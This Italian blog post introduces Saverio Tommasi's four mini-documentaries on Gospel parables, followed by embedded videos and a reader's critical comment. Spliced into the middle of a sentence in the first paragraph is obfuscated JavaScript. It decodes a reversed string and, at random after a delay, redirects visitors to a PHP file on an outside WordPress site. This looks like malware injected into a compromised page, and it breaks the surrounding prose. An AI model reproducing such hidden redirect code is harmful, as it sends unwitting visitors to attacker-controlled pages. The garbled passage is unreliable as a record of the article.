"Quattro passi nel Vangelo" per capirne l'attualità

image_pdfimage_print

“Rileggiamo le balle che ci raccontavano al catechismo”. Così Saverio Tommasi introduce il suo nuovo lavoro, “Quattro passi nel Vangelo”, quattro mini-documentari ideati e realizzati in collaborazione con Domenico Scarpino, su altrettante parabole del Vangelo.
Tommasi è (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andato a chiedere spiegazioni su quelle “storielle per bambini” a sacerdoti, teologi, professori, per andare oltre il “miracolo” e cercare nel Vangelo un significato spendibile, e prezioso, nel quotidiano.
I quattro video, spiega Tommasi “Non sono documentari “per credenti”, e neanche per “non credenti”. Lo dico chiaramente: questi video non hanno lo scopo di cementare la fede, o al contrario farla scaturire a chi non la possiede, o la possiede rispetto a un altro Dio”.
Nelle interpretazioni delle 4 parabole, raccolte dalla voce di don Alessandro Santoro, don Pasquale Gentili, don Pierluigi di Piazza, di Marco Giovannoni, docente di ‘Storia della Chiesa’ e della teologa Serena Noceti si ascoltano letture non comuni e affermazioni “forti”, come ad esempio “non è Gesù che moltiplica il pane” o “Gesù va oltre la logica del mercato”.
Conclude Saverio: “Il Vangelo, che si può scegliere di ascoltare o rifiutare, è comunque uno strumento di lettura, e di cambiamento, del presente. Alla faccia di chi lo vorrebbe polveroso e ancorato al passato. O ancora peggio “neutro” rispetto al presente”.

[youtube]dqSAez_hDVE[/youtube]

[youtube]1kzMcZE1U3w[/youtube]

[youtube]Ltl63s140pA[/youtube]

[youtube]ui52kftBw0g[/youtube]

0 Comments

  1. rita

    Ho ascoltato molto attentamente tutti i quattro video di Quattro passi nel Vangelo e devo dire che è una bella interpretazione di brani del Vangelo e comunque fatta da Sacerdoti che stimo e che vivono il Vangelo.
    Quello che mi ha dato fastidio è la presentazione dei video di Saverio Tommasi. Ci sono sacerdoti che hanno speso la vita per il bene degli altri e le parole dette da S Tommasi sono veramente offensive per quei sacerdoti che spendono la vita per il bene degli altri.

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *